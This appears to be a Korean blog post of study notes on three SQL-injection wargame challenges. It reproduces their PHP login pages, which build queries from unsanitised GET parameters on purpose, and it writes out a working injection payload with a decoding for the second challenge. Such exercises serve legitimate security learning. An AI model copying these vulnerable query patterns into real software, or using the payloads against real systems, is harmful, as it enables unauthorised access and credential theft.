1.
<html>
<head>
<style type="text/css">
* { margin:0 auto; padding:10pt; }
input[type=submit] { width:150pt; }
</style>
<title>SQL 100</title>
</head>
<body>
<?php
mysql_connect("localhost","","");
mysql_select_db("");
$password=md5("????");
if($_GET[id] && $_GET[pw])
{
// injection point
$query="select id,pw from user where id='$_GET[id]' and pw='$_GET[pw]'";
$data=mysql_fetch_array(mysql_query($query));
if($data[id]=="guest")
{
echo("hi guest!");
}
else if($data[id]=="admin")
{
echo("hi admin!");
echo("<br>password is $password");
}
else
{
echo("Wrong<br>".htmlspecialchars($query)."<br>");
}
echo("<br><br><a href=index.php>Done</a>");
exit();
}
?>
<form method=get action=index.php>
<table border=0 align=center cellpadding=20 cellspacing=0>
<tr><td>username</td><td><input type=text name=id value='guest'></td></tr>
<tr><td>password</td><td><input type=password name=pw value='guest'></td></tr>
<tr><td colspan=2 align=center><input type=submit value='Login'></td></tr>
</table>
</form>
<center><a href=index.phps>index.phps</a></center>
</body>
</html>
admin으로 로그인 해서 password를 알아내는 문제
burp suite로 테스트 해보라는데 ...
뭘 알아야...
해설
2.
<html>
<head>
<style type="text/css">
* { margin:0 auto; padding:10pt; }
input[type=submit] { width:100pt; }
div { background:lightblue;text-align:center;width:300pt; }
</style>
<title>SQL 150</title>
</head>
<body>
<center>
<?php
mysql_connect("localhost","","");
mysql_select_db("");
$password=md5("????");
if($_GET[no])
{
if(eregi("[a-z]",$_GET[no])) exit("Access Denied");
$query="select * from user where no=$_GET[no]";
$data=mysql_fetch_array(mysql_query($query));
if($data[user]=="guest") echo("hi guest");
else if($data[user]=="admin") echo("password is $password");
else echo("Wrong<br>".htmlspecialchars($query));
}
?>
</center>
<form method=get action=index.php>
<div>No <input type=text name=no value='1234'><input type=submit></div>
</form>
<center><a href=index.phps>index.phps</a></center>
</body>
</html>
해설
php에서 함수의 매개변수로 NULL값이 전달되었을 때, 내부적으로 문자열로 변환되는 경우가 많음
input에 1234를 입력하고 제출 버튼 클릭
/index.php?no=1234 이렇게 쿼리 스트링이 날아감
no=%27%00%27 or 1=1 order by no desc%23 이렇게 적어주면 되는데
%27%00%27 or 1=1 order by no desc%23 는 인코딩 된 형태
디코딩 하면 ↓
' NULL ' or 1=1 order by no desc #
%27 → 싱글쿼터 (')
%00 → NULL
%23 → #
3.
<html>
<head>
<style type="text/css">
* { margin:0 auto; padding:10pt; }
input[type=submit] { width:100pt; }
div { background:lightblue;text-align:center;width:300pt; }
</style>
<title>SQL SPACE</title>
</head>
<body>
<center>
<?php
mysql_connect("","","");
mysql_select_db("");
$password="????";
if($_GET[id] && $_GET[pw])
{
$_GET[pw]=addslashes($_GET[pw]);
$_GET[id]=str_replace(" ","",$_GET[id]);
$_GET[pw]=str_replace(" ","",$_GET[pw]);
$query="select * from user where pw='$_GET[pw]' and user='$_GET[id]'";
echo("<b>".htmlspecialchars($query)."</b><br>");
$data=mysql_fetch_array(mysql_query($query));
if($data[user]=="guest") echo("hi guest");
if($data[user]=="admin") echo("password is $password");
}
?>
</center>
<form method=get action=index.php>
<table border=0 align=center cellpadding=10>
<tr><td>ID</td><td><input type=text name=id value='guest'></td></tr>
<tr><td>PW</td><td><input type=password name=pw value='guest'></td></tr>
<tr><td colspan=2 align=center><input type=submit value='Login'></td></tr>
</table>
</form>
</body>
</html>
pw = a 인 것은 그냥 파라미터가 넘어가야해서 넣어준것
'보안 > 취약점 진단 및 대응' 카테고리의 다른 글
| SQL Injection (0) | 2024.12.21 |
|---|